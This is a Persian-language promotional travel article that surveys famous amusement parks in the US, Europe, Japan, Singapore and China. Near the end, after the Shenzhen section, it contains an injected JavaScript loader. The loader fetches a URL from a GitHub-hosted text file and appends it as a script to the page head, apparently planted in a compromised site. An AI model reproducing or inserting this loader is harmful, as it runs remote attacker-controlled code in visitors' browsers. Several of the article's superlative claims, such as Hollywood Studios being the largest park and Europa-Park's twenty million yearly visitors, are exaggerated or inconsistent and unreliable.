بهترین شهر بازی های جهان

  • بهترین شهر بازی های جهان چه نام دارد و در کداکم کشور اند. و داری چه وسایلی هستند.

    amusement-park-world

    همچنان‌که سفر به شهرهای معروف دنیا، فرصتی برای ثبت خاطراتی شیرین و بیاد ماندنی است؛ شهر بازی های معروف دنیا، تجربه‌ی بی‌مانند خاطراتی هیجان‌انگیز و بدون تکرار هستند. هیجان واژه‌ی اصلی و حس ناب حاصل از هر دقیقه حضور در شهربازی‌های مدرن و شگفت‌انگیز است. امروزه ساخت و راه‌اندازی وسایل و سرگرمی‌های شهربازی به دانشی وسیع در حوزه‌های مختلف نیازمند است و شرکت‌های فعال در این زمینه، تمامی امکانات و توان خود را بکار می‌گیرند تا در ارائه‌ی وسایلی متفاوت، جذاب و ایمن همواره در اوج باشند. از سوی دیگر طراحی و فضاسازی شهربازی‌های امروزی با الهام از موضوعات مختلف و در اوج دقت، خلاقیت، نوآوری و زیبایی انجام می‌گیرد. مجموعه‌ی وسیعی از عوامل انسانی و فناوری گرفته تا رشته‌های مختلف علمی و هنری در کنار یکدیگر قرار می‌گیرند تا یک شهربازی کامل و به‌روز احداث شده و به بهره‌برداری برسد.

    هر شهر بازی بزرگ ، یک سرزمین عجایب با دنیایی از شگفتی‌ها

    با در نظر گرفتن تمامی این عوامل، بیراه نگفته‌ایم اگر ادعا کنیم: هر شهر بازی بزرگ و معروف، یک سرزمین عجایب است با دنیایی از شگفتی‌ها که جسم و ذهن هر گردشگر را از چرخه‌ی جریانات عادی و تکراری روزمره خارج می‌سازد. جذابیت و فضای پویا و پر نشاط شهر بازی‌ها باعث شده تا این جاذبه‌های گردشگری جایگاه و نقش مهمی در صنعت گردشگری امروزی پیدا کنند. یکی از محبوب‌ترین نقاط دیدنی هر شهر بزرگ برای گردشگران، شهر بازی آن است و دنیای شگفت‌انگیز شهر بازی‌ها هرسال جایگاه بالاتری در جذب توریست به خود اختصاص می‌دهد. بنابراین توصیه می‌کنیم که بعد از خواندن این مقاله، در سفرهای آینده حتماً سراغی از شهر بازی مقصد خود بگیرید! الی گشت در این مقاله شما را با منتخبی از شهر بازی های معروف دنیا آشنا خواهد کرد.

    بهترین شهر بازی ها

    استودیوی هالیوود دیزنی: فلوریدا، ایالات متحده آمریکا

    بی هیچ تردیدی می‌توان گفت که خیال‌انگیزترین و منحصربفردترین شهر بازی‌های دنیا، شهر بازی‌های کمپانی معروف والت دیزنی است که به شکل زنجیره‌ای در نقاط مختلف جهان و بویژه در پایتخت هالیوود، کالیفرنیا ساخته شده‌اند. دیدنی‌ها و سرگرمی‌ها در هر یک از این شهر بازی‌ها با الهام از یک دوره‌ی درخشان در تاریخ دیزنی و با به‌کار گرفتن دستاوردها و آثار مشهور و موفق هالیوود در آن مقطع زمانی، طراحی شده‌اند. استودیوی هالیوود دیزنی واقع در اورلاندوی فلوریدا، بعنوان بزرگترین شهر بازی جهان، هر بازدیدکننده‌ای را با زیبایی‌های خود مسحور می‌کند.

    فضای این شهر بازی با الهام از فیلم‌های دهه‌های ۱۹۳۰ و ۱۹۴۰ طراحی شده است. گستردگی و تنوع دنیایی از سرگرمی‌های هیجان انگیز و متفاوت باعث می‌شود تا گردشگران متوجه گذر زمان نشوند. پرواز سه‌بعدی شبیه‌سازی شده، سازهای سنگی، نمایش‌های صحنه‌ای و پارک‌های موضوعی با الهام از آثار مشهور دیزنی، از پرطرفدارترین سرگرمی‌ها در این شهر بازی هستند. استودیوی هالیوود دیزنی در اورلاندو سرزمین وسیعی است که فضای خیره‌کننده‌ای دارد و بلوار هالیوود، دریاچه‌ی اکو و خیابان‌های آمریکا از دیدنی‌های مهم آن هستند. یکی از معروف‌ترین بخش‌های این شهر بازی، رستوران هوایی مهیج آن و صرف غذا در محیطی متفاوت و نشاط آور است. در میان شهر بازی‌های دیزنی، استودیوی هالیوود دیزنی در اورلاندو، بزرگترین و پرطرفدارترین عضو مجموعه در میان خانواده‌ها و کودکان است و یکی از بهترین شهر بازی های معروف دنیا بحساب می‌آید.

    استودیوی هالیوود دیزنی: فلوریدا، ایالات متحده آمریکا

    دیزنی لند پاریس، فرانسه

    دیزنی لند پاریس، به اعتقاد بسیاری از کارشناسان و گردشگران، بهترین شهر بازی سرپوشیده‌ی جهان است. این سرزمین رؤیایی و وسیع که بر اساس آمار منتشر شده، پر بازدیدکننده‌ترین شهر بازی قاره‌ی اروپا است؛ دنیایی از تفریحات شاد و سرگرمی‌های مهیج را به مخاطبان خود عرضه می‌کند که در اکثر آن‌ها ردّپایی از آثار سینمایی و انیمیشن‌های محبوب دیزنی دیده می‌شود.

    تور موزیکال، ترن هوایی شگفت‌انگیز و پر از غافلگیری، رقص نور و آتش‌بازی ‌های خیره‌کننده از مهم‌ترین جاذبه‌ها و نمادهای این شهر بازی بزرگ بعنوان یکی از محبوب‌ترین شهر بازی های معروف دنیا هستند.

    دیزنی لند پاریس، فرانسه| شهربازی های معروف دنیا

    پارک اروپا: جنگل های سیاه، ووژ، آلمان

    یکی از متفاوت‌ترین و بهترین پارک‌های جهان، پارک اروپا در آلمان است. شهری وسیع و منحصربفرد در محوطه‌ای به وسعت بیست هکتار که گردشگران در آن از فضای پرشور و اسرار آمیز دوران گذشته و نیز داستان‌ها و افسانه‌های مشهور قاره‌ی سبز دیدن می‌کنند. معماری و سبک زندگی دوره‌های مختلف، ترن هوایی و سرسره‌های آبی خروشان و مهیج، نمایش‌ها و رژه‌های محلی و بازدید از قبایل مختلف و جنگجویان باستانی از اصلی‌ترین جاذبه‌های این پارک است.

    سالانه بیش از بیست میلیون گردشگر از پارک اروپا در کشور آلمان دیدن می‌کنند. این مجتمع منحصربفرد و تحسین‌برانگیز به اعتقاد بسیاری از کارشناسان، بهترین پارک و شهر بازی اروپا برای خانوادگان و کودکان است.

    بهترین شهر بازی ها

    افتلینگ: Kaatsheuvel‏؛ هلند

    افتلینگ شهر خیال و رویا و فرصتی استثنایی برای سفر به قصه‌های پریان است. یکی از قدیمی‌ترین شهر بازی‌های جهان که در اوایل دهه‌ی ۱۹۵۰ افتتاح شد و در حال حاضر یکی از بزرگترین و پرمخاطب‌ترین پارک‌های اروپا است. این شهر بازی بخاطر سفرهای هیجان انگیزی که در آن‌ها گردشگران را راهی فضاهای داستانی و افسانه‌ای می‌کند؛ شهرت دارد. فواره‌ی آبی افتلینگ، بزرگترین فواره در قاره‌ی اروپا است. تا به امروز بیش ۱۱۰ میلیون نفر از این شهر بازی زیبا و اسرارآمیز دیدن کرده‌اند. فضای فانتزی، شاد و خیره کننده‌ی افتلینگ هر گردشگری را مجذوب خود می‌سازد و باعث می‌شود تا نام آن همواره در صدر فهرست شهر بازی های معروف دنیا بدرخشد.

    بهترین شهر بازی ها

    پورت اوِنتورا: کوستا دورادا، اسپانیا

    منطقه‌ی ساحلی کوستا دورادا یکی از معروف‌ترین و محبوب‌ترین تفریحگاه‌های ساحلی اسپانیا است. یکی از اصلی‌ترین دلایل این شهرت، شهر بازی و پارک منحصربفرد پورت اونتورا است که بخاطر فضای شاد، پر نشاط و دلچسب خود به یکی از شهر بازی های معروف دنیا تبدیل شده است. این شهر بازی تفریحات خود را با تم الهام گرفته از کاراییب و تمرکز بر فرهنگ و تمدن اقوام مختلف ارائه می‌دهد.

    تفریحات آبی مهیج، سرسره‌های آبی مرتفع و پرخروش، آتش بازی و اجرای موسیقی و نمایش از مهم‌ترین تفریحات این پارک ساحلی شگفت‌انگیز هستند.

    پورت اوِنتورا اسپانیا

    باغ های تیوولی: کپنهاگ، دانمارک

    تیوولی کپنهاگ، یکی از قدیمی‌ترین پارک‌ها و شهربازی‌های جهان است که در سال ۱۸۴۳ افتتاح شده و همچنان به فعالیت خود ادامه می‌دهد. این شهر بازی باشکوه که در باغی قدیمی و چشم‌نواز احداث شده، یکی از شهر بازی های معروف دنیا است که با بیش از چهار میلیون بازدیدکننده در سال، چهارمین شهر بازی پرمخاطب اروپا و مشهورترین مجموعه در میان پارک ها و شهر بازی های اسکاندیناوی است.

    در تیوولی همه‌ی تفریحات حال و هوایی باستانی، خیال‌انگیز، شاد و البته در حد بسیار بالایی پرهیجان دارند. قطار تندروی اودین، دالان تفریحات و برج طلایی از مشخصه‌های اصلی وسایل تفریحی این پارک هستند. دیدنی‌های منحصربفردی در تیوولی وجود دارد که بسیاری از گردشگران را شیفته‌ی خود می‌کند. آکواریوم، باغ گل، سالن‌های نمایش و البته فضایی بکر با حال و هوای اسکاندیناویایی که با نمایش آتش‌بازی باشکوه به اوج می‌رسد؛ از دیگر دیدنی‌های باغ جادویی تیوولی است.

    شهربازی های معروف دنیا | باغ های تیوولی دانمارک

    ساحل تفریحی بلک پول: شمال غربی انگلستان

    پارک یا ساحل تفریحی بلک‌پول یکی از قدیمی‌ ترین شهر بازی های جهان است که در سال ۱۸۹۶ در شهر بلک‌پول افتتاح شد. این شهر بازی که در طول دوران طولانی حیات خود شاهد رویدادها و اتفاقات جالب و بعضاً مهمی بوده است، بدلیل فضای پر رمز و راز، آرام، مفرح و ماجراجویانه‌ی خود یکی از شهر بازی های معروف دنیا و از محبوب‌ترین پارک‌های قاره‌ی اروپا است.

    ترن‌های پر سرعت با مسیری غیر قابل پیش‌بینی که هر ثانیه از حرکت آن معنی واقعی هیجان است، موج‌سواری و ماجراجویی در کانال‌های آبی و نمایش‌ها و دیدنی‌های تاریخی و اسطوره‌ای متنوع و ستودنی؛ بلک‌پول را به پارکی بی‌همتا برای گردشگران تبدیل کرده است. اینجا صدایی از اعماق تاریخ، شما را بسوی آخرین مرزهای ماجراجویی دعوت می‌کند!

    ساحل تفریحی بلک پول انگلستان

    گاردالند: ساحل دریاچه ی گاردا، شمال شرقی ایتالیا

    گاردالند بعنوان بهترین شهر بازی ایتالیا شناخته شده و یکی از شهر بازی های معروف دنیا است. این پارک ساحلی زیبا در دهکده‌ی کوچک ساحلی رونچی در کنار دریاچه‌ی زیبای گاردا ساخته شده است. گاردالند سفری پر هیجان و ماجراجویانه برای به چالش کشیدن خود با تفریحاتی است که در کمتر نقطه‌ای از زمین می‌توان تجربه کرد. مهم‌ترین این سرگرمی‌ها سیاه‌چاله است و حس تعلیق و فرو رفتن در فضایی عجیب در این سیاه‌چاله فراموش نشدنی است.

    در کنار ترن‌ها، سرسره‌ها و تفریحات پرهیجان این شهربازی، گاردالند بدلیل هوایی مطبوع و قرارگیری در محیطی با مناظر دیدنی از شهرت زیادی برخوردار است. آکواریوم زندگی دریایی، مجموعه‌ی ماموت و تونل دریایی نفس‌گیر و اعجاب انگیز این مجموعه تمام بازدیدکنندگان را به ستایش گاردالند وا می‌دارد.

    شهربازی های معروف دنیا | گاردالند ایتالیا

    جزایر ماجراجویی: اورلاندو، فلوریدا، ایالات متحده آمریکا

    بهترین شهر بازی ها وبزرگترین و منحصربفرد Universal’s Islands of Adventure که معمولا با عنوان جزایر ماجراجویی یا به اختصار IOA شناخته می‌شود؛ یکی از شهر بازی های معروف دنیا است که در سال ۱۹۹۹ با شش جزیره افتتاح شد. هر جزیره با الهام از داستان یک فیلم محبوب؛ گردشگران را به ماجراجویی‌های عجیب، پرشور و نفس‌گیر می‌برد. در سال ۲۰۱۰ هفتمین جزیره‌ای این مجموعه با تم هری‌پاتر تحت عنوان جهان جادویی هری‌پاتر راه‌اندازی شد. هشتمین جزیره از این شهر بازی شگفت‌انگیز در سال ۲۰۱۶ با تم کینگ‌کونگ و تخت عنوان جزیره‌ی جمجمه به مجموعه اضافه شده است.

    جزایر ماجراجویی طرفداران بسیاری در بین علاقمندان تفریحات پرهیجان و چالش انگیز دارد. اینجا مکانی برای رویارویی غیرمنتظره و پر از شگفتی با قهرمانان و ضد قهرمانان فیلم‌های محبوب تاریخ است، ملاقاتی در اوج هیجان و شور. این شهر بازی سالانه بیش از هشت میلیون بازدیدکننده دارد.

    بهترین شهر بازی ها

    فوجی-کیو هایلند: پارک ملی فوجی، ژاپن

    در جستجو برای آشنایی با شهر بازی های معروف دنیا به یکی از هیجان انگیزترین و منحصربفردترین پارک‌ها در سرزمین خورشید می‌رسیم. در سرزمین افسانه‌ها و طبیعت سرکش و خیره‌کننده؛ در دامنه‌های کوه زیبای فوجی دنیایی از ماجراجویی‌های نفس‌گیر و پر هیجان پدید آمده که تمامی رکوردهای هیجان و انرژی را در صنعت پارک‌ها و شهربازی‌ بنام خود ثبت کرده است. شهر بازی فوجی-کیو در منطقه‌ی زیبای پنج دریاچه و پارک ملی فوجی یکی از بهترین شهر بازی های جهان است. محیطی استثنایی و شگفت‌انگیز که برای تمامی سنین و سلیقه‌ها، غافلگیری و جاذبه‌ی فراوانی دارد.

    در شهر بازی فوجی-کیو علاوه بر دیدنی‌های طبیعی و امکاناتی مانند پیست اسکی و چشمه‌های آبگرم کوه فوجی، وسایل بازی خاص و وسوسه‌انگیزی وجود دارد. ترن هوایی پر سرعت و بزرگ پارک یکی از این وسایل است که در زمانی کمتر از دو ثانیه به سرعتی نزدیک ۲۰۰ کیلومتر بر ساعت می‌رسد و محیط اطراف پارک را طی می‌کند. نام ترن هوایی ایجی‌نایکا بعنوان دارنده‌ی بیشترین تعداد وارونگی در کتاب رکوردهای گینس به ثبت رسیده است. دیگر دستگاه رکورددار این شهر بازی، ترن هوایی تاکابیشا است که تندترین شیب‌های مسیر حرکت را در بین ترن‌های جهان دارد. فوجی-کیو نمادی از کشور ژاپن است: طبیعت رؤیایی در کنار بالاترین سطح فناوری و سرعت. این شهر بازی بهشت دوستداران هیجان و ماجراجویی است.

    بهترین شهر بازی ها

    استودیوی یونیورسال: سِنتوسا، سنگاپور

    یکی از بهترین شهر بازی های جهان، استودیوی یونیورسال در جزیره‌ی سنتوسای سنگاپور است. این شهر بازی رؤیایی در سال ۲۰۱۰ افتتاح شده و بر اساس آمار در فهرست پنج شهر بازی پرمخاطب آسیا قرار دارد. یونیورسال استودیو علاوه بر اینکه بهشت رؤیایی کودکان است برای بزرگسالان نیز محیطی پر از خاطرات زیبا و تفریحات پرهیجانی است که جسارت بالایی می‌طلبند و بی‌تردید یکی از شهر بازی های معروف دنیا است.

    این شهر بازی منحصربفرد در هفت بخش طراحی شده است. در این بهشت هیجان‌انگیز فضای شهر نیویورک و یا مکان‌های مشهوری مانند مصر باستان، سرزمین‌های افسانه‌ای و حال و هوای بسیاری از فیلم‌های کمپانی یونیورسال به زیبایی بازسازی شده است. ده‌ها مرکز خرید مدرن و رستوران بین‌المللی و البته، ماجراجویی‌هایی پرشور و بعضاً نفس‌گیر در سرزمین‌های خیالی این مجموعه از مهم‌ترین ویژگی‌های یونیورسال استودیو سنگاپور است. عاشقان انرژی و استرس شهر بازی، در این مکان با ترن‌های پرسرعت، مرتفع و پر پیچ و خمی مواجه می‌شوند که در هیچ شهر بازی دیگری چنین تجربه‌ای نداشته‌اند. سرسره‌هایی با ارتفاع رعب‌آور و بطور ویژه، شتاب‌دهنده‌ی فضایی و ترن دوتایی از وسایل تفریحی این مجموعه هستند که هر کسی اجازه و جرات سوار شدن به آن‌ها را ندارد!

    شهربازی های معروف دنیا | استودیوی یونیورسال سِنتوسا سنگاپور

    دره ی شادی: شِنزِن، چین

    شهر شنزن بعنوان ثروتمندترین منطقه‌ی کشور چین، یکی از اصلیترین مقاصد گردشگری در این کشور است. در میان دیدنی‌های مختلف شنزن، شهر بازی دره‌ی شادی یکی از مهم‌ترین جاذبه‌های گردشگری این ناحیه است. این بهترین شهر بازی ها در زمینی با مساحت تقریبی ۳۵۰ هزار متر مربع، دارای ۹ بخش و بیش از صد بازی و وسیله‌ی تفریحی است. در طراحی بخش‌های مختلف پارک دره‌ی شادی، از معماری، افسانه‌ها و رویدادهای تاریخی کشورهای مختلف جهان الهام گرفته شده است و گردشگران در هر یک از این قسمت‌ها با چشم‌اندازها و غافلگیری‌های مختلفی مواجه می‌شوند.

    دره‌ی شادی یکی از بزرگترین شهر بازی های چین و از شهر بازی های معروف دنیا است که بدلیل دارا بودن مجموعه‌ی کامل و بی‌نظیری از تفریحات پر هیجان، نشاط آور و بعضاً استرس‌ زا و نفس‌گیر شهرت دارد. ترن‌های پر سرعت، سرسره‌های مرتفع، چرخاننده‌ها و تاب‌های پرشتاب از اصلیترین این وسایل هستند که لحظاتی پر از شور و هیجان برای گردشگران رقم می‌زنند. به همین دلیل است که برای استفاده از اغلب وسایل دره‌ی شادی شنزن، محدودیت سنی تعریف شده است!

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید